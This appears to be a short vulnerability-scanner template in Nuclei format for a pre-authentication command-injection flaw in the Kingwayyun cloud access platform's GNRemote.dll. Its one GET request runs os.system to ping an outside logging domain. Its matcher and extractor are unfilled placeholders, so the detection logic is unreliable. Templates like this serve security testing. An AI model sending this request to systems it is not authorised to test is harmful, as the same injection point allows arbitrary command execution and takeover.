id: 金万维-云联应用系统接入平台 GNRemote.dll 前台RCE

info:
  name: G金万维-云联应用系统接入平台 GNRemote.dll 前台RCE
  author: admin
  severity: critical
  description: 金万维-云联应用系统接入平台 GNRemote.dll 前台RCE
  tags: command-injection, rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=ping+cumeyvrvdy.dgrh3.cn"

    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
      Accept-Encoding: "gzip, deflate"
      Accept-Language: "zh-CN,zh;q=0.9"
      Connection: "close"

    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "expected content indicating successful command execution"

    extractors:
      - type: regex
        regex:
          - "regex_to_extract_specific_response_part"